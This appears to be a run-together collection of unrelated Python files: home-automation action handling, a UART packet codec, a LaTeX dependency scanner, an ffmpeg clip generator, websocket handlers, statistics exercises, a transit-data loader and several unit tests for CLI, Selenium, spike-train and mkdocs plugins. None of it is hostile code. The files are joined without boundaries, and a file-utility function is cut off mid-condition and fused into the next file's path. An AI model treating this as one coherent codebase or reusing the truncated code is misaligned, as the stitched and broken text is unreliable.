self.check_condition(condition): return False return True # Otherwise it's OR for condition in condition.conditions: if self.check_condition(condition): return True return False else: logger.warning("Condition not caught") return False def process_notification(self, action: domain.Action): if action.notifications is None: return for notification in action.notifications: topic = notification.get_topic_name() payload = notification.get_payload() self.__sender.publish_notification(topic, payload) def execute_action(self, action: domain.Action, pins_to_switch: Dict[str, List[domain.IndividualAction]], pins_to_dim: Dict[str, List[domain.IndividualDimAction]], last_light_values_to_update: Dict[int, int]) -> None: """ Performs the given action by manipulating the given dictionaries with pins. 
""" if self.check_condition(action.get_condition()): logger.info(f"Process action with type '{action.action_type}'") if isinstance(action, domain.OnAction): action.perform_action(pins_to_switch) elif isinstance(action, domain.OffAction): action.perform_action(pins_to_switch) elif isinstance(action, domain.ToggleAction): master = self.__status_service.get_arduino_pin_status(action.master.parent, action.master.number) action.perform_action(pins_to_switch, master) elif isinstance(action, domain.OnDimmerAction): action.perform_action(pins_to_dim) elif isinstance(action, domain.OffDimmerAction): action.perform_action(pins_to_dim) elif isinstance(action, domain.ToggleDimmerAction): master_json = self.__status_service.get_arduino_dim_pin_status(action.master.parent, action.master.number) # JSON contains 'state' and 'direction' master = util.deserialize_json(master_json) state = util.get_int_from_json_object(master, 'state') direction = util.get_str_from_json_object(master, 'direction') last_light_value_optional = None if action.master_dim_id is not None: last_light_value_optional = self.__status_service.get_dimmer_light_value(action.master.parent, action.master_dim_id) last_light_value = 100 if last_light_value_optional is not None: last_light_value = last_light_value_optional action.perform_action(pins_to_dim, last_light_values_to_update, state, direction, last_light_value) else: logger.error(f"Undefined action of type '{action.action_type}' ({type(action)})") else: logger.info(f"Condition not met") def execute_actions(self, actions: List[domain.Action], button: domain.ButtonPin, arduino_name: str): pins_to_switch = {} pins_to_dim = {} last_light_values_to_update = {} logger.debug(f"Publish immediate actions") for action in actions: self.execute_action(action, pins_to_switch, pins_to_dim, last_light_values_to_update) self.__sender.publish_last_light_values(last_light_values_to_update) self.__sender.publish_relative_action(pins_to_switch) self.__sender.publish_dimmer_module_action(pins_to_dim, arduino_name, button.number) from .PacketStream import * state_wait_sync = 0 state_wait_header = 1 state_wait_data = 2 sync = 0x3c class UartPacket(PacketStream): def __init__(self, stream): self.stream = stream stream.recv = self.on_recv self.state = 0 self.header = bytes() self.data = bytes() self.recv=None def on_recv(self, pkt): if self.state == state_wait_sync: drop=len(pkt) for i,b in enumerate(pkt): if b == sync: self.state = state_wait_header self.header = bytes() self.data = bytes() drop=i break else: print('not sync: ', b) pkt = pkt[drop+1:] if self.state == state_wait_header: need = 3-len(self.header) self.header += pkt[:need] pkt = pkt[need:] if len(self.header) >= 3: C = self.header[0] T = self.header[1] L = self.header[2] CH = C >> 4 if CH != ((T + L) & 0xf): print('header bad') self.state = state_wait_sync else: self.state = state_wait_data if self.state == state_wait_data: C = self.header[0] L = self.header[2] need = L-len(self.data) self.data += pkt[:need] pkt = pkt[need:] need = L-len(self.data) if need == 0: CP = C & 0xf c=0 for i in self.data: c += i if CP != (c & 0xf): print('data checksum is bad') return msg = bytes([self.header[1]]) + self.data if self.recv: self.recv(msg) self.state = state_wait_sync if pkt: self.on_recv(pkt) def send(self, x): binary = x ptype = binary[0] payload = len(binary)-1 header_checksum = (ptype + payload) & 0xf payload_checksum = 0 for i in binary[1:]: payload_checksum += i payload_checksum &= 0xf checksum = (header_checksum << 4) | payload_checksum packet 
= b'\x3c' + bytes([checksum, ptype, payload]) + binary[1:] self.stream.send(packet) python/maketexdeps.py #!/usr/bin/env python3 import argparse import re import os import os.path class Tracker: def __init__(self): self.checked = set() self.unchecked = set() def add(self, items): for i in items: self.unchecked.add(i) def pop(self): try: item = self.unchecked.pop() self.checked.add(item) return item except KeyError: return None def tracked(self): return self.checked class Matcher: """A regexp and a handler in case of match""" def __init__(self, pat, handler): self.pat = re.compile(pat) self.handler = handler def process(self, text): m = self.pat.match(text) if m: return self.handler(m) return None def always_none(m): """Always return None""" return None def first_group(m): """Returns the first group of the match""" return m.group(1) def second_group(m): """Returns the first group of the match""" return m.group(2) def process_line(line, matchers): """Process line with every Matcher until a match is found""" result = None for m in matchers: result = m.process(line) if result: break return result def handle_figure(m): name = m.group(1) if len(os.path.dirname(name)) != 0: return name ext = os.path.splitext(name)[1] if ext == ".pdf": folder = "figures" else: folder = "img" path = os.path.join(folder, name) return path def handle_tex(m): path = '{}.tex'.format(m.group(1)) return os.path.relpath(path) tex_matchers = ( Matcher(r'^[^%]*\\includegraphics(?:\[[^]]*\])?\{([^}]+)\}', handle_figure), Matcher(r'^[^%]*\\input\{([^}]+)\}', handle_tex) ) lang_re = re.compile(r'\\LANG') file_re = re.compile(r'-([a-z]{2})\.') def scan_tex_file(tex): lang = None m = file_re.search(tex) if m: lang = m.group(1) deps = set() with open(tex) as f: for l in f: path = process_line(l, tex_matchers) if path: if lang: path = lang_re.sub(lang, path) deps.add(path) return deps if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('file', help='input file') parser.add_argument("-o", "--out", help="output file") parser.add_argument("-t", "--target", help="target file") args = parser.parse_args() input_file = args.file output_file = args.out target_file = args.target tracker = Tracker() figures = set() f = input_file while f: ext = os.path.splitext(f)[1] if ext == ".tex": new_deps = scan_tex_file(f) tracker.add(new_deps) elif ext == ".pdf": figures.add(f) f = tracker.pop() deps = tracker.tracked() with open(output_file, 'w') as f: f.write('{}: {}\n\n'.format(output_file, input_file)) f.write('{}: \\\n'.format(target_file)) f.write('\t{}'.format(' \\\n\t'.join(deps))) f.write('\n\n') if len(figures): f.write('FIGURES +=\\\n') f.write('\t{}'.format(' \\\n\t'.join(figures))) f.write('\n\n') # f.write(''.join([d + ':\n' for d in deps])) # -*- coding: utf-8 -*- # Description: generate audio clips for lines, words, and syllables import argparse import json import os from pprint import pprint import re import subprocess import sys # input parser = argparse.ArgumentParser() parser.add_argument('-in', dest="INPUT_FILE", default="data/still_i_rise.json", help="Path to input aligned transcript json file") parser.add_argument('-au', dest="INPUT_AUDIO_FILE", default="still_i_rise.wav", help="Path to audio file file") parser.add_argument('-out', dest="OUTPUT_DIR", default="clips/", help="Path to clip directory") parser.add_argument('-min', dest="MIN_DURATION", type=float, default=0.1, help="Minimum duration of a clip") parser.add_argument('-pa', dest="PAD", type=float, default=0.02, help="Amount of seconds to 
pad before and after") parser.add_argument('-fa', dest="FADE", type=float, default=0.02, help="Amount of seconds to fade before and after") parser.add_argument('-o', dest="OVERRIDE", type=int, default=0, help="Override existing syllable data") parser.add_argument('-fe', dest="FILE_EXT", default=".wav", help="File extension of audio clips") # init input args = parser.parse_args() MIN_DURATION = args.MIN_DURATION PAD = args.PAD FADE = args.FADE OVERRIDE = args.OVERRIDE FILE_EXT = args.FILE_EXT types = ["lines", "words", "syllables", "nonwords", "pauses"] # create directories if not os.path.exists(args.OUTPUT_DIR): os.makedirs(args.OUTPUT_DIR) for t in types: if not os.path.exists(args.OUTPUT_DIR + t + "/"): os.makedirs(args.OUTPUT_DIR + t + "/") data = {} with open(args.INPUT_FILE) as f: data = json.load(f) clips = [] lines = data["lines"] words = data["words"] nonwords = data["nonwords"] pauses = data["pauses"] # create clips for i, line in enumerate(lines): line.update({"type": "lines"}) clips.append(line) for i, word in enumerate(words): word.update({"type": "words"}) clips.append(word) for j, syllable in enumerate(word["syllables"]): syllable.update({"type": "syllables"}) clips.append(syllable) for i, word in enumerate(nonwords): word.update({"type": "nonwords"}) clips.append(word) for i, word in enumerate(pauses): word.update({"type": "pauses"}) clips.append(word) # generate clips for i, clip in enumerate(clips): fname = args.OUTPUT_DIR + clip["type"] + '/' + clip["name"] + FILE_EXT fnameTmp = args.OUTPUT_DIR + clip["type"] + '/' + clip["name"] + "_temp" + FILE_EXT if os.path.isfile(fname) and not OVERRIDE: continue start = max(round(clip["start"] - PAD, 2), 0) end = round(clip["end"] + PAD, 2) dur = end - start if dur < MIN_DURATION: end = round(start + MIN_DURATION, 2) # cut the clip command = ['ffmpeg', '-i', args.INPUT_AUDIO_FILE, '-ss', str(start), '-to', str(end), '-c', 'copy', fnameTmp, '-y'] # print " ".join(command) finished = subprocess.check_call(command) # fade the clip st = round(end - start - FADE, 2) command = ['ffmpeg', '-i', fnameTmp, '-af', "afade=t=in:ss=0:d="+str(FADE)+",afade=t=out:st="+str(st)+":d="+str(FADE), fname, '-y'] # print " ".join(command) finished = subprocess.check_call(command) # delete temp file os.remove(fnameTmp) run_async/handlers.py """Collection of handler classes (dictionary-like objects) """ # Author: <> # Copyright (c) 2015 <> # License: BSD 3 clause from collections import defaultdict # from queue import Queue from multiprocessing import SimpleQueue try: from tornado.websocket import WebSocketHandler except ImportError: pass from .settings import JS_ROLE from .utils import format_ws_connection_id class Handler(): """Container object for data management. The handler contains a dictionary whose default type is determined according to the class provided in the constructor""" def __init__(self, factory=None): if factory is None: factory = str # Default type of data self._data = defaultdict(factory) def add(self, key, value): self._data[key] = value def remove(self, key): _ = self._data.pop(key, None) def get(self, key): return self._data.get(key, None) def __contains__(self, key): return key in self._data @property def entries(self): return list(self._data.keys()) class WebSocketConnectionHandler(Handler): """Handler for `tornado.websocket.WebSocketHandler` connections. 
Entries' keys are the _connection_id[s], namely --- """ def __init__(self): super(WebSocketConnectionHandler, self).__init__( factory=WebSocketHandler) class ResultCache(Handler): """Handler for caching execution results, namely JSON (string) output. Entries' keys are the (clients) _connection_id[s], namely --- """ def __init__(self): super(ResultCache, self).__init__(factory=str) def add(self, session_id, value): cache_id = format_ws_connection_id(JS_ROLE, session_id) super(ResultCache, self).add(cache_id, value) class ExecutionHandler(Handler): """Handler to store the execution queues in order to make clients to wait on correct thread queues. Entries' keys are the session_id[s], namely "one queue per session_id". """ def __init__(self): super(ExecutionHandler, self).__init__(factory=SimpleQueue) 0 from IMLearn.learners import UnivariateGaussian, MultivariateGaussian import numpy as np import plotly.graph_objects as go import plotly.io as pio pio.templates.default = "simple_white" def test_univariate_gaussian(): print("********* Q1 *********") # Question 1 - Draw samples and print fitted model uni = UnivariateGaussian() X = np.random.normal(10, 1, 1000) uni.fit(X) print((uni.mu_, uni.var_)) # Question 2 - Empirically showing sample mean is consistent print("********* Q2 *********") ms = np.linspace(10, 1000, num=100).astype(int) distances = [] for m in ms: distances.append(np.abs(uni.mu_ - np.mean(X[0:m]))) go.Figure([go.Scatter(x=ms, y=distances, mode='markers+lines', name=r'$\widehat\mu$')], layout=go.Layout(title=r"$\text{Distance between the estimated and true value of the expectation}$", xaxis_title=r"$\text{Number of samples}$", yaxis_title="r$|\hat\mu - \mu|$", height=350)).show() print("********* Q3 *********") # Question 3 - Plotting Empirical PDF of fitted model pdfs = uni.pdf(X) go.Figure([go.Scatter(x=X, y=pdfs, mode='markers', name=r'$\widehat\mu$')], layout=go.Layout(title=r"$\text{Sample values and corresponding PDF's}$", xaxis_title="$\\text{ Sample values }$", yaxis_title="$\\text{PDF of sample value}$", height=300)).show() def test_multivariate_gaussian(): # Question 4 - Draw samples and print fitted model print("********* Q4 *********") mult_mu = np.array([0, 0, 4, 0]) mult_cov = np.array([[1, 0.2, 0, 0.5], [0.2, 2, 0, 0], [0, 0, 1, 0], [0.5, 0, 0, 1]]) X = np.random.multivariate_normal(mult_mu, mult_cov, size=(1000,)) multi = MultivariateGaussian() multi.fit(X) print("Estimated Expectation: ", multi.mu_) print("Covariance Matrix: ") print(multi.cov_) # Question 5 - Likelihood evaluation f1_space = np.linspace(-10, 10, 200) f3_space = np.linspace(-10, 10, 200) log_like = [] for i in range(len(f1_space)): log_like.append([]) for j in range(len(f3_space)): log_like[i].append(MultivariateGaussian.log_likelihood(np.array([f1_space[i], 0, f3_space[j], 0]),mult_cov,X)) heatmap = go.Figure(data = go.Heatmap(x = f3_space,y =f1_space,z = log_like)) heatmap.update_layout(showlegend = True,autosize = True,title = "Q5 Heatmap", xaxis_title = "$\\text{ f3 Values }$",yaxis_title = "$\\text{ f1 Values }$") heatmap.show() # Question 6 - Maximum likelihood maxi = np.max(log_like) arg_max = np.argmax(log_like) i = arg_max // 200 j = arg_max % 200 f1_max = f1_space[i] f3_max = f3_space[j] print("Max value is: ",maxi) print("f1 and f3 arg max:") print(f1_max,f3_max) if __name__ == '__main__': np.random.seed(0) test_univariate_gaussian() test_multivariate_gaussian() scottshepard/divvybikes-project0 import requests import mysql.connector import yaml r = 
requests.get('https://data.cityofchicago.org/resource/8mj8-j3c4.json') stations = r.json() with open("config.yml", 'r') as config_doc: config = yaml.safe_load(config_doc) cnx = mysql.connector.connect(**config) cursor = cnx.cursor() for station in stations: station['longitude'] = station['location']['coordinates'][0] station['latitude'] = station['location']['coordinates'][1] station['location'] = str(station['location']) print(station) add_station = ("INSERT INTO cta_stations" "(stop_id, direction_id, stop_name, station_name, \ station_descriptive_name, station_id, ada, red, blue, green, \ brown, pink, purple, purple_express, orange, yellow, \ longitude, latitude)" "VALUES (%(stop_id)s, %(direction_id)s, %(stop_name)s, \ %(station_name)s, %(station_descriptive_name)s, %(map_id)s, \ %(ada)s, %(red)s, %(blue)s, %(g)s, %(brn)s, %(pnk)s, \ %(p)s, %(pexp)s, %(o)s, %(y)s, \ %(longitude)s, %(latitude)s)") cursor.execute(add_station, station) cnx.commit() cursor.close() cnx.close()import re import tempfile from pathlib import Path import typer from typer.testing import CliRunner from drudgeyer.cli.add import main as add_main from drudgeyer.cli.delete import main from drudgeyer.cli.show import main as list_main app = typer.Typer() app.command("delete")(main) app.command("add")(add_main) app.command("list")(list_main) runner = CliRunner() def test_delete(mocker): with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.add.BASEDIR", Path(tempdir)) mocker.patch("drudgeyer.cli.show.BASEDIR", Path(tempdir)) mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) # add test task result = runner.invoke(app, ["add", "echo 2"]) result = runner.invoke(app, ["add", "echo 3"]) assert result.exit_code == 0, result.stdout # query task ids result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout assert len(result.stdout.split("\n")) > 2, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] # delete task target = parsed[-1] result = runner.invoke(app, ["delete", target]) assert result.exit_code == 0, result.stdout result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] assert target not in parsed # with dependencies with tempfile.TemporaryDirectory() as tempsrcdir: srcdir = Path(tempsrcdir) (srcdir / "a.txt").touch() result = runner.invoke(app, ["echo 111", "-d", tempsrcdir]) # query task ids result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout assert len(result.stdout.split("\n")) > 2, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] # delete task target = parsed[-1] result = runner.invoke(app, ["delete", target]) assert result.exit_code == 0, result.stdout result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] assert target not in parsed assert not (Path(tempdir) / "dep" / target).is_dir() def test_delete_failed(mocker): with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) result = runner.invoke(app, ["delete", ""]) assert result.exit_code == 1, result.stdout with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) result = runner.invoke(app, ["delete", "x"]) assert result.exit_code == 1, 
result.stdout lblaszkowski/python_training class ContactHelper: def __init__(self, app): self.app = app def fill_all_user_data(self, contact): wd = self.app.wd wd.find_element_by_name("firstname").send_keys(contact.firstname) wd.find_element_by_name("middlename").send_keys(contact.middlename) wd.find_element_by_name("lastname").send_keys(contact.lastname) wd.find_element_by_name("nickname").send_keys(contact .nickname) wd.find_element_by_name("photo").send_keys("C:\\python_training\\image\\images.jpg") wd.find_element_by_name("title").send_keys(contact.title_photo) wd.find_element_by_name("company").send_keys(contact.company) wd.find_element_by_name("address").send_keys(contact.address) wd.find_element_by_name("home").send_keys(contact.home) wd.find_element_by_name("mobile").send_keys(contact.mobile) wd.find_element_by_name("work").send_keys(contact.work) wd.find_element_by_name("fax").send_keys(contact.fax) wd.find_element_by_name("email").send_keys(contact.email) wd.find_element_by_name("email2").send_keys(contact.email2) wd.find_element_by_name("email3").send_keys(contact.email3) wd.find_element_by_name("homepage").send_keys(contact.homepage) wd.find_element_by_name("bday").send_keys(contact.bday) wd.find_element_by_name("bmonth").send_keys(contact.bmonth) wd.find_element_by_name("byear").send_keys(contact.byear) wd.find_element_by_name("aday").send_keys(contact.aday) wd.find_element_by_name("amonth").send_keys(contact.amonth) wd.find_element_by_name("ayear").send_keys(contact.ayear) wd.find_element_by_name("address2").send_keys(contact.address2) wd.find_element_by_name("phone2").send_keys(contact.phone2) wd.find_element_by_name("notes").send_keys(contact.notes) wd.find_element_by_name("submit").click() def del_contact_in_book_address(self): wd = self.app.wd wd.find_element_by_link_text("home").click() wd.find_element_by_name('selected[]').click() wd.find_element_by_xpath('//*[@id="content"]/form[2]/div[2]/input').click() wd.switch_to_alert().accept() def edit_contact_in_book_address(self, contact): wd = self.app.wd wd.find_element_by_link_text("home").click() wd.find_element_by_name('selected[]').click() wd.find_element_by_xpath('//*[@id="maintable"]/tbody/tr[3]/td[8]/a').click() wd.find_element_by_name("firstname").clear() wd.find_element_by_name("firstname").send_keys(contact.firstname) wd.find_element_by_name("lastname").send_keys(contact.lastname) wd.find_element_by_name("nickname").send_keys(contact.nickname) wd.find_element_by_name("photo").send_keys("C:\\python_training\\image\\images1.jpg") wd.find_element_by_name("title").send_keys(contact.title_photo) wd.find_element_by_name("address").send_keys(contact.address) wd.find_element_by_name("home").send_keys(contact.home) wd.find_element_by_name("mobile").send_keys(contact.mobile) wd.find_element_by_name("work").send_keys(contact.work) wd.find_element_by_name("fax").send_keys(contact.fax) wd.find_element_by_name("email").send_keys(contact.email) wd.find_element_by_name("bday").send_keys(contact.bday) wd.find_element_by_name("bmonth").send_keys(contact.bmonth) wd.find_element_by_name("byear").send_keys(contact.byear) wd.find_element_by_name("aday").send_keys(contact.aday) wd.find_element_by_name("amonth").send_keys(contact.amonth) wd.find_element_by_name("ayear").send_keys(contact.ayear) wd.find_element_by_name("update").click() def return_to_groups_page(self): wd = self.app.wd wd.find_element_by_link_text("home page").click() def count(self): wd = self.app.wd self.fill_all_user_data() return 
len(wd.find_elements_by_name("selected[]")) 10-100 #!/usr/bin/env python import os, numpy as np def np_concatenate(fold): aa = [] for name in os.listdir(fold): if not name.endswith(".npy"): continue path = os.path.join(fold, name) a = np.load(path) aa.append(a) pass c = np.concatenate(aa) return c if __name__ == '__main__': a_dir="/tmp/QCtxTest/rng_sequence_f_ni1000000_nj16_nk16_tranche100000" b_path = "/tmp/QCtxTest/rng_sequence_f_ni1000000_nj16_nk16_tranche1000000/rng_sequence_f_ni1000000_nj16_nk16_ioffset000000.npy" a = np_concatenate(a_dir) b = np.load(b_path) assert np.all( a == b ) import pytest from gramlock import gramlock def test_exists(): assert gramlock def test_yes_1(): s = 'abba' expected = 4 actual = gramlock(s) assert expected == actual def test_no_1(): s = 'abcd' expected = 0 actual = gramlock(s) assert expected == actual def test_yes_2(): s = 'ifailuhkqq' expected = 3 actual = gramlock(s) assert expected == actual def test_yes_3(): s = 'bbbb' expected = 10 actual = gramlock(s) assert expected == actual def test_yes_4(): s = 'cdcd' expected = 5 actual = gramlock(s) assert expected == actualimport shutil import os import glob import re import sys import platform import ctypes import pickle import alt.cfg import alt.system import builtins def slash(path): return path.replace('\\','/') def touch(filename): mkdir( dir(filename) ) open(filename,'w').close() def name_ext(filename): filename = slash(filename) pos0 = filename.rfind('/')+1 return filename[pos0:] def ext(filename): filename = slash(filename) pos0 = filename.rfind('/')+1 pos1 = filename.rfind('.') if pos1==-1 or pos1bmtk/tests/utils/reports/spike_trains/test_sonata_adaptor.py import pytest import os import numpy as np from bmtk.utils.reports.spike_trains import SpikeTrains, pop_na from bmtk.utils.reports.spike_trains import spike_train_buffer def full_path(file_path): cpath = os.path.dirname(os.path.realpath(__file__)) return os.path.join(cpath, file_path) @pytest.mark.parametrize('path', ['spike_files/spikes.old.h5']) def test_old_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(full_path(path)) assert(st.populations == [pop_na]) node0_timestamps = st.get_times(node_id=0, population=pop_na) assert(len(node0_timestamps) > 0) assert(np.all(st.get_times(node_id=0) == node0_timestamps)) assert(np.all(st.get_times(node_id=0, population='should_still_work') == node0_timestamps)) @pytest.mark.parametrize('path', ['spike_files/spikes.one_pop.h5']) def test_single_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(path) assert(st.populations == ['v1']) node0_timestamps = st.get_times(node_id=0, population='v1') assert(np.all(st.get_times(node_id=0) == node0_timestamps)) assert(st.get_times(node_id=0, population='should_not_work') == []) @pytest.mark.parametrize('path', ['spike_files/spikes.multipop.h5']) def test_multi_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(path) assert('tw' in st.populations and 'lgn' in st.populations) n1_tw_ts = st.get_times(node_id=0, population='tw') n1_lgn_ts = st.get_times(node_id=0, population='lgn') assert(len(n1_tw_ts) > 0) assert(len(n1_lgn_ts) > 0) assert(not np.array_equal(n1_tw_ts, n1_lgn_ts)) # (np.any(n1_tw_ts != n1_lgn_ts)) assert(st.get_times(node_id=0, population='other') == []) @pytest.mark.parametrize('path', ['spike_files/spikes.multipop.h5']) def test_multipop_with_default(path): path = full_path(path) st = SpikeTrains.from_sonata(path, population='tw') assert('tw' in st.populations and 'lgn' not in 
st.populations) n1_tw_ts = st.get_times(node_id=0, population='tw') assert(len(n1_tw_ts) > 0) assert(np.all(n1_tw_ts == st.get_times(node_id=0))) def test_empty_spikes(): st = SpikeTrains(adaptor=spike_train_buffer.STMemoryBuffer()) output_path = full_path('output/tmpspikes.h5') st.to_sonata(path=output_path) st.close() st_empty = SpikeTrains.from_sonata(output_path) assert(st_empty.populations == []) assert(st_empty.n_spikes() == 0) assert(list(st_empty.spikes()) == []) os.remove(output_path) if __name__ == '__main__': #test_old_populations('spike_files/spikes.old.h5') #test_single_populations('spike_files/spikes.one_pop.h5') test_multi_populations('spike_files/spikes.multipop.h5') #test_multipop_with_default('spike_files/spikes.multipop.h5') #test_empty_spikes()0 from mkdocs.config.base import load_config def test_plugin_languages_backward_compat_1(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"fr": "français", "en": "english"}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_2(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={"i18n": {"default_language": "en", "languages": {"en": "english"}}}, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_3(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={"i18n": {"default_language": "en", "languages": {"fr": "français"}}}, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "en", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_4(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"default": {"name": "english_default"}, "fr": "français"}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english_default", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_5(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, 
docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": { "name": "english", "build": True, "site_name": "English site name", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "English site name", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_6(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": {"name": "français", "link": "/fr"}, "en": { "name": "english", "build": False, "site_name": "MkDocs static i18n plugin tests", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "/fr", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_7(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"fr": {"name": "français"}, "en": {"name": "english"}}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_8(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": {"name": "english", "build": True}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_9(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": {"name": "english", "build": False}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": 
"./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_10(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default", "build": True}, "fr": "français", }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english_default", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_11(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"build": True}, "fr": "français", }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "en", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_12(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "fr", "languages": { "default": {"name": "french_default"}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "fr": { "name": "french_default", "link": "./", "build": True, "site_name": "MkDocs static i18n plugin tests", }, 